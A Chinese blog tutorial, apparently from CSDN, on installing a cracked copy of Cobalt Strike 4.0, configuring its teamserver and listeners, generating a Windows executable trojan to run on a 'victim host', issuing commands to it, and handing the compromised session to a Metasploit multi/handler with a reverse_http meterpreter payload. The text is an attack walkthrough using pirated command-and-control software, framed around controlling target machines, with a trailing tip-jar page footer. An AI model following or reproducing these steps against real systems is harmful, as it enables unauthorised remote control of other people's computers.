Cobaltstrike的安装和基本使用+MSF联动

Cobaltstrike的安装

注意:配置cs需要配置客户端和服务器

服务器端

首先下载cobaltstrike,下载完成后,将cobaltstrike4.0-cracked.zip上传至服务器并解压,第一次运行需要安装java环境,进入解压后的目录运行如下命令:

./teamserver 101.43.x.x password  #这里的密码是一会要验证的密码,随便输入,ip是自己服务器的ip

在这里插入图片描述

客户端

将cobaltstrike4.0-cracked.zip解压,双击运行start.bat,并配置你的服务器ip和端口(默认50050),点击Connection

这里的用户名随便填,密码就是刚刚在服务器上设置的密码

在这里插入图片描述
连接完成界面;
在这里插入图片描述

Cobaltstrike的使用

Cobaltstrike和msfconsole最大的区别就是CS支持多个人一同协作(多人运动),因为是多人协作,所以需要区分一下哪些资源是各自的,通过配置监听器来实现拥有各自的监听管道
在这里插入图片描述
按照下图配置完成后,点击HTTP Hosts右边的+号,最后save保存即可
在这里插入图片描述
到这里,监听器就配置完成了!


简单木马生成实例

下面来举一个简单的实现攻击的例子:
这里面是常见的攻击工具,我们拿下图的Windows Executable为例
在这里插入图片描述
配置木马的监听器,配置完成后点击Generate生成木马,将其导出即可
在这里插入图片描述
将该木马放到受害主机上双击运行,即可收到上线提示
在这里插入图片描述

命令的输入

进入图形化界面右击鼠标选择Interact,即可输入命令,输入help可以查看命令列表
在这里插入图片描述
例如输入一条cmd命令:

shell ipconfig

在这里插入图片描述
探针其他主机

net view

插件的扩展

CS本身自带的插件并不是很多,所以如果有更多需求,可以通过扩展插件来解决
在这里插入图片描述

Cobaltstrike与Msfconsole的联动

部署Msfconsole

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 5555      #监听5555端口
exploit

部署Cobaltstrike

1.添加一个msf监听器,HTTP Host是你的外网服务器地址,HTTP Port 自定义
在这里插入图片描述
2.添加一个木马监听器
在这里插入图片描述
3.生成木马,并选择名为wooden horse的监听器,并用木马控制目标主机(步骤省略)
在这里插入图片描述
4.右击受控主机,点击spawn,并选择名为msf的监听器
在这里插入图片描述

同时msfconsole服务器这边选择监听

use exploit/multi/handler
set lhost 0.0.0.0
set lport 5555
set payload windows/meterpreter/reverse_http

这时候再去看msfconsole服务器,已经成功收到反弹会话【这里可能要等待连接的时间有点长】
在这里插入图片描述


这里有个坑我有必要说一下,由下图可知msf联动的监听器的payload是http的,我之前一直在msf配置windows/meterpreter/reverse_tcp,结果导致一直断开连接,连接不上,一定要注意,这边的payload是啥,对应那边就用啥!!!
在这里插入图片描述

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

向阳-Y.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值